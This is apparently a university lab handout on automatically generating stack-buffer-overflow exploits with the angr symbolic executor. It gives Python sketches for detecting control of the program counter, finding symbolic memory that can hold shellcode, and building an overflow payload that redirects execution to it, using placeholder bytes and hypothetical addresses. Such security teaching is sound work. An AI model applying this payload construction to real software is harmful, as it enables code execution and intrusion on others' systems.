Lab3: Automated Exploit Generation

Download the test case from here. You need a Linux environment for all the labs.

0. Preparation

First, we are going to use Angr to perform symbolic execution and automatically generate a working exploit. Angr is not the fastest symbolic executor, but it is written in Python, so it is easy to use.

Follow the instructions at https://angr.io/ to install Angr.

UPDATE: it turns out that angr does not support the gets function used in the example. To fix this, download the implementation and add the following lines to your exploit script, so that the handler is registered before the project object is created.

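import angr
from gets import gets  # the downloaded gets implementation, saved as gets.py next to this script

# Register the gets handler for libc BEFORE creating the project
angr.SIM_LIBRARIES["libc.so.6"].add("gets", gets)

proj = angr.Project("example01")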

1. Objectives

Our objective for this lab assignment is to learn how to use a symbolic executor to generate an exploit against a stack buffer overflow vulnerability. Generally, this involves three steps: finding the vulnerability, finding where to inject the shellcode, and redirecting execution to the injected shellcode.

Angr already provides many good tutorials on using it for reverse engineering, including how to generate exploits.

2. Workflow

Step one: find an execution trace that allows you to control the program counter (PC). To do so, we let Angr perform path exploration to find a simulation state that is unconstrained. This is similar to the taint checker paper we discussed. Note that Angr considers a state unconstrained when the PC is symbolic (i.e., controlled by the input), but such control could be partial (e.g., when only one byte of the return address is overwritten). While such a state could still be exploitable, to make the exploit easier you can further check whether all bytes of the PC are symbolic.
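To make the partial-versus-full distinction concrete, here is a small stand-alone Python model (plain Python, not angr) of a contiguous overflow that classifies how many bytes of the return address the input reaches. The frame layout used in the demo (72 bytes from the buffer start to the saved return address) is hypothetical; take the real offset from your binary. In angr itself, the corresponding steps would plausibly be to create the simulation manager with `save_unconstrained=True`, step until the `unconstrained` stash is non-empty, and build the per-byte mask from something like `[state.solver.symbolic(b) for b in state.regs.pc.chop(8)]`. Treat those calls as a starting point to verify against your angr version.

```python
# Toy model (not angr): how much of the saved return address does the input control?
# Assumption: input is copied contiguously from the start of the buffer, and
# ret_offset is the (hypothetical) distance from the buffer start to the return address.

PTR_SIZE = 8  # x86-64 return addresses are 8 bytes


def controlled_ret_bytes(input_len, ret_offset, ptr_size=PTR_SIZE):
    """Per-byte mask: True if that byte of the return address comes from the input.

    The NUL terminator that gets() appends is not counted: its value is always 0,
    so it is not attacker-controlled.
    """
    return [ret_offset + i < input_len for i in range(ptr_size)]


def pc_control(mask):
    """Classify control over the PC from a per-byte 'is symbolic' mask."""
    if all(mask):
        return "full"     # every byte symbolic: PC can be set to any address
    if any(mask):
        return "partial"  # PC is still symbolic, but only some bytes are ours
    return "none"


if __name__ == "__main__":
    # Hypothetical frame: 64-byte buffer + 8-byte saved RBP => return address at offset 72.
    for n in (72, 73, 80):
        print(n, pc_control(controlled_ret_bytes(n, 72)))
```

A fully controlled PC is what lets the final step point execution at an arbitrary buffer address.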

Once you have found a program state that could be exploitable, the next step is to find a location to inject your shellcode. To do so, you can search the virtual memory for a contiguous sequence of symbolic/tainted bytes that is large enough to host the shellcode (e.g., like this). Then, we check whether it is feasible to constrain the symbolic bytes so that they are interpreted as shellcode. This should be straightforward if the bytes are copied directly from the input, but for programs that transform the input, it could be challenging.
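The search for a landing zone can be sketched as a scan over a per-byte "is symbolic" mask for a memory range. This is a plain-Python model: the mask, base address, and minimum length in the demo are hypothetical. With angr, one way to fill such a mask might be to test `state.memory.load(addr, 1).symbolic` for each address in a candidate range (for example, around the stack pointer). Beware that angr can also represent uninitialized memory as symbolic, so a symbolic byte is not necessarily input-derived.

```python
# Toy model (not angr): find contiguous runs of symbolic bytes big enough for the
# shellcode. mask[i] says whether the byte at base + i is symbolic (tainted by input).


def find_shellcode_regions(mask, base, min_len):
    """Return (address, length) for every maximal symbolic run of at least min_len bytes."""
    regions = []
    run_start = None
    # The trailing False is a sentinel that closes a run ending at the last byte.
    for i, is_sym in enumerate(list(mask) + [False]):
        if is_sym and run_start is None:
            run_start = i                      # a new run begins
        elif not is_sym and run_start is not None:
            length = i - run_start             # the current run just ended
            if length >= min_len:
                regions.append((base + run_start, length))
            run_start = None
    return regions


if __name__ == "__main__":
    # Hypothetical snapshot: 4 concrete, 10 symbolic, 2 concrete, 30 symbolic bytes.
    mask = [False] * 4 + [True] * 10 + [False] * 2 + [True] * 30
    for addr, size in find_shellcode_regions(mask, 0x1000, 27):
        print(hex(addr), size)
```

Returning every qualifying region, rather than only the first, leaves room to pick one that does not overlap the return address.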

The last step is to connect the symbolic PC to the location of the shellcode by adding the constraint that the PC must equal the address of the buffer holding the shellcode. Finally, we ask the SMT solver for a feasible assignment of the input bytes under which all three conditions are satisfied: (1) the PC is controlled, (2) the buffer holds the shellcode, and (3) the PC points to the shellcode.
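In the simplest case, where input bytes land in memory unchanged, the solver's feasible assignment reduces to a direct concatenation. The plain-Python sketch below builds that input for a little-endian x86-64 target with the shellcode at the very start of the buffer. The buffer address, the 72-byte offset, and the NOP placeholder bytes used in the demo are hypothetical, not real shellcode. In an angr script, the corresponding steps would plausibly be `state.add_constraints(state.regs.pc == buf_addr)`, plus constraints tying the loaded buffer bytes to the shellcode, then a `state.solver.satisfiable()` check and `state.posix.dumps(0)` to extract the stdin contents that satisfy everything.

```python
# Toy model (not angr) of the final assignment when input is copied verbatim onto
# the stack: shellcode at the buffer start, padding, then the buffer address
# written over the saved return address (little-endian, 64-bit).
import struct


def build_payload(shellcode, buf_addr, ret_offset):
    """Return input bytes that place shellcode at buf_addr and set the PC to it.

    ret_offset: (hypothetical) distance from the buffer start to the return address.
    """
    if len(shellcode) > ret_offset:
        raise ValueError("shellcode would overlap the return address")
    padding = b"A" * (ret_offset - len(shellcode))           # filler up to the return address
    payload = shellcode + padding + struct.pack("<Q", buf_addr)  # PC := buffer address
    if b"\n" in payload:
        # gets() stops reading at a newline, so the input must not contain one.
        raise ValueError("payload contains a newline byte")
    return payload


if __name__ == "__main__":
    # Placeholder NOP bytes stand in for real shellcode; the address is hypothetical.
    payload = build_payload(b"\x90" * 16, 0x7FFFFFFFE000, 72)
    print(len(payload), payload[-8:].hex())
```

Placing the shellcode at offset 0 is only a simplification; any symbolic region found in the previous step works as long as it stays clear of the return address.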

3. Submission

Please submit your report through iLearn, preferably in PDF format. In the report, please include your complete source code with sufficient explanation, along with its output messages.